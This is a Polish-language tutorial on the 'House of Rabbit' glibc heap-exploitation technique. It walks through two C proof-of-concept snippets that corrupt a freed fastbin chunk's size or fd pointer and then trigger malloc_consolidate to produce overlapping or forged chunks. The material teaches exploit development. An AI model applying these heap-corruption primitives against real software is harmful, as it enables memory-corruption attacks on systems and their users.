House of Rabbit

Wymagania

1. Możliwość modyfikacji wskaźnika fd fast bin lub rozmiaru: Oznacza to, że możesz zmienić wskaźnik do przodu kawałka w fastbin lub jego rozmiar.

2. Możliwość wywołania malloc_consolidate: Można to zrobić, przydzielając duży kawałek lub łącząc górny kawałek, co zmusza stertę do konsolidacji kawałków.

Cele

1. Utworzenie nakładających się kawałków: Aby jeden kawałek nakładał się na inny, co pozwala na dalsze manipulacje stertą.

2. Fałszowanie fałszywych kawałków: Aby oszukać alokator, aby traktował fałszywy kawałek jako prawdziwy kawałek podczas operacji na stercie.

Kroki ataku

POC 1: Modyfikacja rozmiaru kawałka fast bin

Cel: Utworzenie nakładającego się kawałka poprzez manipulację rozmiarem kawałka fastbin.

• Krok 1: Przydziel kawałki

unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
unsigned long* chunk2 = malloc(0x40);  // Allocates another chunk of 0x40 bytes at 0x602050
malloc(0x10);                          // Allocates a small chunk to change the fastbin state

We allocate two chunks of 0x40 bytes each. These chunks will be placed in the fast bin list once freed.

• Krok 2: Zwolnij kawałki

free(chunk1);  // Frees the chunk at 0x602000
free(chunk2);  // Frees the chunk at 0x602050

Zwalniamy oba kawałki, dodając je do listy fastbin.

• Krok 3: Zmodyfikuj rozmiar kawałka

chunk1[-1] = 0xa1;  // Modify the size of chunk1 to 0xa1 (stored just before the chunk at chunk1[-1])

Zmieniamy metadane rozmiaru chunk1 na 0xa1. To kluczowy krok, aby oszukać alokator podczas konsolidacji.

• Krok 4: Wywołaj malloc_consolidate

malloc(0x1000);  // Allocate a large chunk to trigger heap consolidation

Alokacja dużego kawałka wywołuje funkcję malloc_consolidate, łącząc małe kawałki w szybkim binie. Manipulowany rozmiar chunk1 powoduje, że nakłada się na chunk2.

Po konsolidacji chunk1 nakłada się na chunk2, co umożliwia dalszą eksploitację.

POC 2: Zmodyfikuj wskaźnik fd

Cel: Stworzyć fałszywy kawałek poprzez manipulację wskaźnikiem fd szybkiego bina.

• Krok 1: Alokuj kawałki

unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
unsigned long* chunk2 = malloc(0x100); // Allocates a chunk of 0x100 bytes at 0x602050

Wyjaśnienie: Alokujemy dwa kawałki, jeden mniejszy i jeden większy, aby przygotować stertę dla fałszywego kawałka.

• Krok 2: Utwórz fałszywy kawałek

chunk2[1] = 0x31;  // Fake chunk size 0x30
chunk2[7] = 0x21;  // Next fake chunk
chunk2[11] = 0x21; // Next-next fake chunk

Pisaliśmy fałszywe metadane chunków do chunk2, aby zasymulować mniejsze chunki.

• Krok 3: Zwolnij chunk1

free(chunk1);  // Frees the chunk at 0x602000

Wyjaśnienie: Zwalniamy chunk1, dodając go do listy fastbin.

• Krok 4: Zmodyfikuj fd chunk1

chunk1[0] = 0x602060;  // Modify the fd of chunk1 to point to the fake chunk within chunk2

Wyjaśnienie: Zmieniamy wskaźnik do przodu (fd) chunk1, aby wskazywał na nasz fałszywy chunk wewnątrz chunk2.

• Krok 5: Wywołaj malloc_consolidate

malloc(5000);  // Allocate a large chunk to trigger heap consolidation

Przydzielenie dużego kawałka ponownie wyzwala malloc_consolidate, który przetwarza fałszywy kawałek.

Fałszywy kawałek staje się częścią listy fastbin, co czyni go legalnym kawałkiem do dalszej eksploatacji.

Podsumowanie

Technika House of Rabbit polega na modyfikacji rozmiaru kawałka fast bin, aby stworzyć nakładające się kawałki lub manipulacji wskaźnikiem fd, aby stworzyć fałszywe kawałki. Pozwala to atakującym na fałszowanie legalnych kawałków w stercie, co umożliwia różne formy eksploatacji. Zrozumienie i praktykowanie tych kroków poprawi twoje umiejętności eksploatacji sterty.